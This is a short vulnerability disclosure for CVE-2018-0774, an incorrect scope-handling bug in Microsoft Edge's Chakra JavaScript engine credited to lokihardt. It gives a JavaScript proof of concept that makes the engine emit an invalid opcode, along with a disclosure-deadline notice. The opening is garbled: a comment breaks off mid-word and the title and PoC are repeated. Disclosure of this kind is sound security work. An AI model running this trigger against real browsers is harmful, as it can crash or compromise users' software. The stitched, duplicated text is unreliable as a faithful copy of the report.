Microsoft Edge: Chakra: Incorrect scope handling

CVE-2018-0774


PoC:
(function func(arg = function () {
print(func); // SetHasOwnLocalInClosure shou Microsoft Edge: Chakra: Incorrect scope handling

CVE-2018-0774


PoC:
(function func(arg = function () {
print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
print(func);
function func() {

}
})();

Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt